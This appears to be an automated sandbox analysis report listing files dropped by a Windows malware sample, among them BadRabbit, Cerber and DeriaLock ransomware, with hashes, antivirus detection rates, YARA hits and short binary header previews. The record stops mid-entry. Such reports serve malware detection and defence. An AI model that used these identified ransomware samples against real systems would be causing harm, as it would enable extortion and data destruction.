                                                                                                                                                            Preview:V.g..$.u.sy..Se.%.].0...*.W.v.T4j.S.n.|..h..^.v.z.m.].$... .U.y..$e:..V%......W.miNP..h8.0n...o..T...u.,e.",{.Y....(.c..%.g...'$.. m.......w..$.=...S......^...Ud..RH.&PN.*..9..\Dp+.R..1+N=<......UC.+.k....o...Rg..@aj...?.,;Y.g.|2....h...pT.....'..m.}.9.3.LG..h......n{....I......0..hj..Y6...........UF...=..#DA_.z....,..h...e.C......b@EU.I.....=o*E(.t....N.8.G.....{..i.+Z.-J.F#..T.x....{6.C..kO......\4./%.+....{....`...ud,.}RlT.8/..N.h...(.Oj.p.."..T.Q.Kkf!..k......{9M...J..x...k...d....p-.x..1....T$.]...l.6H...=..1...].p..iF..._.x.~m@,..^.;=..CC.]w.9..(....W@....f...pr3.=..7..kL....H7..fy.V..-&.4.g8:.etM...).Y>~.].b.=.|..5.hA..E4......].]!.v..[..+.......#..K!..>X..%D....w.F.m='r....7.4h.ZmL....M......-A...3.W.uiS..2)qg...`.Z......UG.r.uV..!....8/.*.Z....A.......BV=.B.9c.....z..Y....(.5L..).v.IW...[..L..$.....5..I.<....D..M..Z.X.H..........(...s...5/.=..en........cJ.K.....\..n..K|......:..ka3...T.f..OP..v.E...........N.1p.p..4q8..>W
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):402632
                                                                                                                                                            Entropy (8bit):7.999545291816681
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:KPd6ZnyRPZJhKymLkH+yDXZEyfMrvDca6:Koy5ZJ7BeeXmb8a6
                                                                                                                                                            MD5:61DA9939DB42E2C3007ECE3F163E2D06
                                                                                                                                                            SHA1:4BD7E9098DE61ADECC1BDBD1A01490994D1905FB
                                                                                                                                                            SHA-256:EA8CCB8B5EC36195AF831001B3CC46CAEDFC61A6194E2568901E7685C57CEEFA
                                                                                                                                                            SHA-512:14D0BC14A10E5BD8022E7AB4A80F98600F84754C2C80E22A8E3D9F9555DDE5BAD056D925576B29FC1A37E73C6EBCA693687B47317A469A7DFDC4AB0F3D97A63E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..........XK.._.$..+.......Endermanch@BadRabbit.exe...IS. ...l.).......m.._.7..FS.yC.h.-o.l...4.7FO.....?.X.>*k..Q./+._U.x@...SF..2...!7^F.v=.e.........*.SV....an. E..af...RK.z_VM..E......,...N......xD{~....t..r......o..4....i_p....S..:2.....(.b..=.7..A...'`.........1......5b..k..j.B.@.N~..r"..:.e#.`.....?`..K.).....ll....NC.!...... ...u`...b..$..SM,.].Z.Po...W,Y6....S.q...{...y..V.C&.][.T7....].l....=..."=$\..!.f.....Rc......fU.......Z.tu.....pJ.|.....:.m.~....z....7_Z.&<...&7.w.?Q.*rq. ..E.k.a.m.`..b.$z.i.w...Gwe.,r.H.rB6..)./[?...O.z....w.~.nO7"O./L.mM.,-.u..${.v85.ff.ob..a..}...:.pBY4f...D.WZ...Hf.*..62..>...9....._r:QHZhX..0.n..g...[q.9...f...,.WcWLii....N..".....hsuD.....[...^.._..z.!.}m|..o...L...?54.P.2].$Y.......K z.....*.;Z..F.........]......k...*.4Ud.$.E.N.d.~...}BD..xg+.g....>.{.U..hkh...&...\...f..7...u1..<.Z....Q.......RF1Y.O~..3.....RM..;bq./D.g.'.y...QRVz.!.\w..!....I.L..y....U.V.!;*..7).0/..5D.M..y.....{....g...Q.%|.V4,_k]3
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):116134
                                                                                                                                                            Entropy (8bit):7.998443688728203
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:3072:KS3AAMRbzhdikdvWC5PWTAiloSQOE8rzl7YP++bA4k5:KgkRbPrdsAizPLy2+b0
                                                                                                                                                            MD5:6CA327B67F1A2B2A4FBB7F342E15E7BF
                                                                                                                                                            SHA1:AAB4A7D8199E8416AD8649FEDE35B846FC96F082
                                                                                                                                                            SHA-256:460A3E3A039C2D0BB2C76017B41403BF3E92727269F49B08778D33108278B58F
                                                                                                                                                            SHA-512:B7A7574CA52885E531ACA71EBE52F7832F8A2436CDA047E7686936FE0337EAE7C4EBCC57DF27C26316871D4167EA4E6794BEB933F7C13EFB0ADDAC0D400E4D9A
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK...........?...............Endermanch@Birele.exex.Rz..Y.n..].&m|.f..[...t0"...!..}.[..[z...I...hk.H..B.T...........2dP;)eK.t..i.o....S.Ct_;Y...Y..q..D<....{..b......kI.y#\-..EGm._.p..~M...\...f.`...,..e2p.._X{^..".^..~m......C...2.r$...9>u..&&.....(@.....=..<5.....yUT.W<UDAw..(.+..r.......e.........0.....e,.]b`........_.~./@..6...&...p./-.2Ug...+......H..bZo.M.....^.'m,../..#..7....0.<c.b.Cl.Y.a...#....Z_.g.y.BH...HOY.cw.u.. .4\y...c..i...5.P[oW.1.|]Il.d\..s...T..%z.h.).....6W.-lGu..!.q5......!....;..m".z.h.>,..s.SF6...........L..Vv....V..C!....^.U4h...A.g@I<......`..r.#.0u..O.,..".4.....N.C.*5!..N,).lGy.*.6.S....Ox__d.........$..0G..^ <u[.& )...!.=............E.m..w0W...)..D....;Bs...".4...o....]...>d..p.L.'..&...{.A..N..n...$,m.h.*..i.,.lcP.m....NS..L.k"_.Ua.z..!T........S.}....}?b.h.Q#.....D(..%.l.....).I.uZ.R..:Ut..7"....#............7.jN...q5=.=a....\K...&.O......A.J~.....'.D..A..p...).....J_a...t\....."H.*... !.W.Y.>.#?...%AO1WkK.....b.1.h.
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):185620
                                                                                                                                                            Entropy (8bit):7.999024397332973
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:3072:1rdfCdJA9AZODSf1MIH34E8Ylcg16hK1z0mZiPS6weJ2vbYEzoN:LfuA2D1MIHl8Ylt151z0mZiPSM2vbY7
                                                                                                                                                            MD5:10D74DE972A374BB9B35944901556F5F
                                                                                                                                                            SHA1:593F11E2AA70A1508D5E58EA65BEC0AE04B68D64
                                                                                                                                                            SHA-256:AB9F6AC4A669E6CBD9CFB7F7A53F8D2393CD9753CC1B1F0953F8655D80A4A1DF
                                                                                                                                                            SHA-512:1755BE2BD1E2C9894865492903F9BF03A460FB4C952F84B748268BF050C3ECE4185B612C855804C7600549170742359F694750A46E5148E00B5604ACA5020218
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK...........JW9.Zb...........Endermanch@Cerber5.exe.e...@.V..j.y.,yY...8..T....z.)..nI... ....~r\.......5r|....$....}<......=..@.:...`......:..wa.D..}..-(8\.O.&~...H..~S.O.).2._.}...E...n&J..?....;....v+...M..N.s./c.'A%.O.^p..a.....(+.)....e1A..E~.....D...2...y..,L.8Xh-......X...G..)H. p......u..U.M...%..hDOS#.s...W.2%'m.$u(.zA....C.W..<.b..8.x.?.......k....$..a...$....~.oF.rX.i.... ...#..{i.&...............iM7..%.....jc...b=).d.WX4?.....[_....p.1x.H...U.a..$.V..../i.$5.C.L.]sID.D..G...53..q:... \....N.\@6...F.R...Ui.=h"Zzh...V}..o.h.W.!$] .P>...kA..x.m......[...=$z.....8.3.U....G...1.<1].Z. ..L........3z....BW..oQ...+.v...BKe..V..C.....p.a...p(yu.&ip.....oC..`........O.$%..|.=..;X..."49..w..t,.Rp.Y.Z<].F\.ry0@...j.b...?.(....D.!%!gP....Qn...B..{.."K.w....ZA....l..._._...>)..Rm.@.1?.3.....DM......3M?..,.s/..N.<..).+[..n2?.6gH).v.>C.0...J.f.&.iF..%.d.|.>8u..9A.>./.U...U.+..0_".V.......%....kCi0*)L..M.Jq........R>.CA.oBOPI..N..\o.PoV..
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):215551
                                                                                                                                                            Entropy (8bit):7.999084540418597
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:6144:rly5xPXQYQtWnwNRIPbk7DLJSa/tJru36a6fijJ5/j:rly5xPXQQwIY7sax75fizb
                                                                                                                                                            MD5:016D1CA76D387EC75A64C6EB3DAC9DD9
                                                                                                                                                            SHA1:B0A2B2D4D639C6BCC5B114B3FCBB56D7C7DDBCBE
                                                                                                                                                            SHA-256:8037A333DFECA754A46E284B8C4B250127DAEF6D728834BF39497DF03006E177
                                                                                                                                                            SHA-512:F08653184D7CAF48E971635699B17B9502ADDB33FB91CC6E0A563E6A000AEB57AC0A2EDD5A9E21EF99A4770C0DBB65899150FA5842B0326976A299382F6BE86E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK.........D.I....II..........Endermanch@DeriaLock.exe.^..N._9>.........N..Se2..5y.....g.i_j..dvp.j.K..e.6..-..A..'....Q..8..#j.O.....#<.w.D...<.._`06.W...!....K..,...yu.Be.i...X.;r.+...".`..........$.6..J~..Vd....L...{..+.,...8ly\.S...i....<t..^.l..{[.v.a\.p.E.....]MK.+7_N&G.TX.3F..`..<I....,\....G.8...O^.?..W#.......r..T[.<V@.s......<.xc....~.&........|.;..i.l.A+.N.b.....t..te..l...4....+.q+.F.X.:....A#.AA..U\k....M.L.#...N.".p....2..j.^.(v-.*3'.....e...:....,S../...r..z...`...]..G.....`.k.^...y..i.S....2..9.P.B.X..Q.`.]..........}kd...f.c...r.;j..{x8....,....RK.-Bc.7mv..a1.#.....c.q...Y...7.To...6I6~...s.W3.M...w......h..*!...C}..H..v5....|9..<..q..`....Z...2"..I.:......8......Hw.>..5.7*.2..{EGV.l.s,.xg..CK.................q....>..x.F.>...\...n..!.*/L.G..@g'...h.K.V.g....,....t.F.;U,b....3...7d...6l...8.kQ|.-...N.1......q..i....0.>......2..9.L.>.>...q.O.&..o.LrUL..{d..!e8.9..1....(T.....|p..T.?...t...{H.....M..P..\Rw..c...*me;..}.wd......
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1227610
                                                                                                                                                            Entropy (8bit):7.967961253692764
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:Lutr5OUF7zfbMEsJiZp8uSOBpik+Qijrcq0y0JL4SprofsCghjmxQ:LuXfbMvGei9yjrcq0y0JL4ggghjv
                                                                                                                                                            MD5:910DD666C83EFD3496F21F9F211CDC1F
                                                                                                                                                            SHA1:77CD736EE1697BEDA0AC65DA24455EC566BA7440
                                                                                                                                                            SHA-256:06EFFC4C15D371B5C40A84995A7BAE75324B690AF9FBE2E8980F8C0E0901BF45
                                                                                                                                                            SHA-512:467D3B4D45A41B90C8E29C8C3D46DDFBDEE9875606CD1C1B7652C2C7E26D60FEDAC54B24B75DEF125D450D8E811C75974260BA48A79496D2BDAF17D674EDDB47
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..9..9..9...a..1...a..*..9....'.z.<..0.l.8..0.k....0.}.8..'.{.8..0.~.8..Rich9..........PE..L...f.K..................................... ....@..........................P.......6...............................7..3....)..........`>..........................."............................................... ...............................text...n........................... ..`.rdata..e.... ......................@..@.data........@.......&..............@....CRT.................(..............@..@.rsrc...`>.......@...*..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2066944
                                                                                                                                                            Entropy (8bit):7.407449411158182
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:FH/1Fdq0wneDrEoYxWFjmYMcKabLVp3diY7kp:FH/1Fdq0nIo2YAcl/NisA
                                                                                                                                                            MD5:C7E9746B1B039B8BD1106BCA3038C38F
                                                                                                                                                            SHA1:CB93AC887876BAFE39C5F9AA64970D5E747FB191
                                                                                                                                                            SHA-256:B1369BD254D96F7966047AD4BE06103830136629590182D49E5CB8680529EBD4
                                                                                                                                                            SHA-512:CF5D688F1AEC8EC65C1CB91D367DA9A96911640C695D5C2D023836EF11E374FF158C152B4B6207E8FCDB5CCF0EED79741E080F1CBC915FE0AF3DACD624525724
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o...........C.^....C.\.......O....|.....l.=....o.&....s......}.....y....Rich............PE..L....FL..........................................@.................................a. .........................................|....`..............................`..................................@.......................@....................text............................... ..`.rdata..............................@..@.data............<..................@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):757637
                                                                                                                                                            Entropy (8bit):7.942040838313248
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:kUWA3AheuswygKEOKlC0DaWL8ldxj1UT1fzosC2kyINJATi1v2yUQpf84i:kUWqistgKErL8P6VzosCfE6TNpf8D
                                                                                                                                                            MD5:382430DD7EAE8945921B7FEAB37ED36B
                                                                                                                                                            SHA1:C95DDAEBE2AE8FBCB361F3BF080D95A7BB5BF128
                                                                                                                                                            SHA-256:70E5E902D0AC7534838B743C899F484FE10766AEFACC6DF697219387A8E3D06B
                                                                                                                                                            SHA-512:26ABC02BDE77F0B94613EDC32E0843AC71A0A8F3D8BA01CB94A42C047D0BE7BEFEF52A81984E9A0FA867400082A8905E7A63AAAF85FA32A03D27F7BC6A548C3B
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 28%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}...9.o.9.o.9.o..a..1.o..a..*.o.9.n...o.'...<.o.0..8.o.0....o.0...8.o.'...8.o.0...8.o.Rich9.o.........PE..L.....J.................................... ....@..........................P......7...............................P7..3....(..........`>..........................."............................................... ...............................text...|........................... ..`.rdata....... ......................@..@.data........@.......$..............@....CRT.................&..............@..@.rsrc...`>.......@...(..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):835669
                                                                                                                                                            Entropy (8bit):7.967994410818332
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:De/2dxVZ+ivtwdeOkD5YNfEp5UOc1+A4cMfZIYMlBlfwFyfr7BM9G/9V:6/iBFSkyNfI51cQFhMlvIofZRn
                                                                                                                                                            MD5:7DFBFBA1E4E64A946CB096BFC937FBAD
                                                                                                                                                            SHA1:9180D2CE387314CD4A794D148EA6B14084C61E1B
                                                                                                                                                            SHA-256:312F082EA8F64609D30FF62B11F564107BF7A4EC9E95944DFD3DA57C6CDB4E94
                                                                                                                                                            SHA-512:F47B05B9C294688811DD72D17F815CCE6C90F96D78F6835804D5182E2F4BFBD2D6738DE854B8A79DEA6345F9372BA76A36920E51E6CB556EF4B38B620E887EB4
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 64%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<...].,.].,.].,.%f,.].,.%p,.].,.%`,.].,.].,.\.,.%w,.].,.,.].,.%g,.].,.%b,.].,Rich.].,................PE..L...G._U.................D....W..............`....@..........................``.............................................(.........`..G...........................................................................`..x............................text...VC.......D.................. ..`.rdata.......`.......H..............@..@.data...0.V..@...H...$..............@....data2..x.....`......l..............@....rsrc....G....`..H...x..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):441899
                                                                                                                                                            Entropy (8bit):7.891913976230692
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:BHNTywFAvN86pLbqWRKHZKfErrZJyZ0yqsGO3XR63:vT56NbqWRwZaEr3yt2O3XR63
                                                                                                                                                            MD5:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                                                                            SHA1:DE5C8D858E6E41DA715DCA1C019DF0BFB92D32C0
                                                                                                                                                            SHA-256:630325CAC09AC3FAB908F903E3B00D0DADD5FDAA0875ED8496FCBB97A558D0DA
                                                                                                                                                            SHA-512:74ECA8C01DE215B33D5CEEA1FDA3F3BEF96B513F58A750DBA04B0DE36F7EF4F7846A6431D52879CA0D8641BFD504D4721A9A96FA2E18C6888FD67FA77686AF87
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, Author: Florian Roth
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 93%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 83%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&\..G2.G2.G2.?..G2.?..G2.....G2.....G2.?..G2.G3.G2...G2...G2.Rich.G2.........................PE..L......Y.................0...................@....@.......................... ............@..................................m..d........p...............4...........................................................@..t............................text............0.................. ..`.rdata..*0...@...2...4..............@..@.data...<............f..............@....rsrc....p.......r...h..............@..@.reloc..N...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):119296
                                                                                                                                                            Entropy (8bit):7.911347099102218
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:pYV/aVHN9ySTn34w33FVTyuGAxsvBLSqAKZqoqrxy031l3y:8adNlltyu3Pa5gr33
                                                                                                                                                            MD5:41789C704A0EECFDD0048B4B4193E752
                                                                                                                                                            SHA1:FB1E8385691FA3293B7CBFB9B2656CF09F20E722
                                                                                                                                                            SHA-256:B2DCFDF9E7B09F2AA5004668370E77982963ACE820E7285B2E264A294441DA23
                                                                                                                                                            SHA-512:76391AC85FDC3BE75441FCD6E19BED08B807D3946C7281C647F16A3BE5388F7BE307E6323FAC8502430A4A6D800D52A88709592A49011ECC89DE4F19102435EA
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 78%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................................................................................................................................................PE..L...)..G.............................d.......p....@..........................................................................t.......p.......................................................f......................................................UPX0....................................UPX1................................@....rsrc........p......................@......................................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):320760
                                                                                                                                                            Entropy (8bit):6.315890725389197
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:nl578cxdGY87FohbnmM2i8ito7wTmCbL94KCT3OAmK:nl59zH8MiM2z+NLQBN
                                                                                                                                                            MD5:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                                                                            SHA1:C07DFDEA8DA2DA5BAD036E7C2F5D37582E1CF684
                                                                                                                                                            SHA-256:B3E1E9D97D74C416C2A30DD11858789AF5554CF2DE62F577C13944A19623777D
                                                                                                                                                            SHA-512:266C541A421878E1E175DB5D94185C991CEC5825A4BC50178F57264F3556080E6FE984ED0380ACF022CE659AA1CA46C9A5E97EFC25FF46CBFD67B9385FD75F89
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\Desktop\Endermanch@Cerber5.exe, Author: pekeinfo
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 76%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`x...+...+...+B..+...+..u+...+...+...+..+...+...+...+..+...+..+...+Rich...+........PE..L.....sY.....................8....................@.................................{.......................................X...........0...............................................................................0............................text.............................. ..`.rdata...).......*..................@..@.data...............................@....rsrc...0...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):495616
                                                                                                                                                            Entropy (8bit):6.338057450703654
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:lqHKx3YCgy8HmmjJpnVhvLqCO3bLinIz1wASx:lqHoyHNj/nVhvLcyII
                                                                                                                                                            MD5:0A7B70EFBA0AA93D4BC0857B87AC2FCB
                                                                                                                                                            SHA1:01A6C963B2F5F36FF21A1043587DCF921AE5F5CD
                                                                                                                                                            SHA-256:4F5BFF64160044D9A769AB277FF85BA954E2A2E182C6DA4D0672790CF1D48309
                                                                                                                                                            SHA-512:2033F9637B8D023242C93F54C140DD561592A3380A15A9FDC8EBFA33385FF4FC569D66C846A01B4AC005F0521B3C219E87F4B1ED2A83557F9D95FA066AD25E14
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exe, Author: Joe Security
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 69%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`X............................~.... ... ....@.. ....................... ............`.................................$...W....@.............................. ............................................... ............... ..H............text........ ...................... ..`.sdata..8.... ......................@....rsrc.......@......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):195400
                                                                                                                                                            Entropy (8bit):7.873003999274124
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:15TDpNFVbxDSXJFFGhcBR1WLZ37p73G8Wn7GlDOg+ELqdSxo5XtIZjnvxRJgghaR:157TcfFPB6B3GL7g+me5aZjn5VlI9T/
                                                                                                                                                            MD5:248AADD395FFA7FFB1670392A9398454
                                                                                                                                                            SHA1:C53C140BBDEB556FCA33BC7F9B2E44E9061EA3E5
                                                                                                                                                            SHA-256:51290129CCCCA38C6E3B4444D0DFB8D848C8F3FC2E5291FC0D219FD642530ADC
                                                                                                                                                            SHA-512:582B917864903252731C3D0DFF536D7B1E44541EE866DC20E0341CBEE5450F2F0FF4D82E1EEE75F770E4DAD9D8B9270AB5664FFEDFE21D1AD2BD7FE6BC42CF0E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................^...|.......0.......p....@..........................0......7........................................t.......p..h...............h............................................................p...............................text....].......^.................. ..`.rdata.......p.......b..............@..@.data....T...........v..............@....ndata...................................rsrc...h....p.......z..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2007552
                                                                                                                                                            Entropy (8bit):7.761090155030316
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:p/VoMTzwF77l0VqmuTefhLTtk31XyXb9:ptoMTzwVmq3ettk31ob9
                                                                                                                                                            MD5:CB02C0438F3F4DDABCE36F8A26B0B961
                                                                                                                                                            SHA1:48C4FCB17E93B74030415996C0EC5C57B830EA53
                                                                                                                                                            SHA-256:64677F7767D6E791341B2EAC7B43DF90D39D9BDF26D21358578D2D38037E2C32
                                                                                                                                                            SHA-512:373F91981832CD9A1FF0B8744B43C7574B72971B5B6B19EA1F4665B6C878F7A1C7834AC08B92E0ECA299EB4B590BF10F48A0485350A77A5F85FC3D2DD6913DB3
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 36%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,7.M.................H...V.......f... ........@.. ....................... ............@..................................f..K.......@P........................................................................... ............... ..H............text....F... ...H.................. ..`.sdata...............L..............@....rsrc...@P.......R...N..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):216064
                                                                                                                                                            Entropy (8bit):3.1340875869032985
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:YoCFfC303p22fkZrRQpnqjoi7l832fbu9ZXILwVENbM:rCVC303p22sZrRQpnviB832Du9WMON
                                                                                                                                                            MD5:B805DB8F6A84475EF76B795B0D1ED6AE
                                                                                                                                                            SHA1:7711CB4873E58B7ADCF2A2B047B090E78D10C75B
                                                                                                                                                            SHA-256:F5D002BFE80B48386A6C99C41528931B7F5DF736CD34094463C3F85DDE0180BF
                                                                                                                                                            SHA-512:62A2C329B43D186C4C602C5F63EFC8D2657AA956F21184334263E4F6D0204D7C31F86BDA6E85E65E3B99B891C1630D805B70997731C174F6081ECC367CCF9416
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
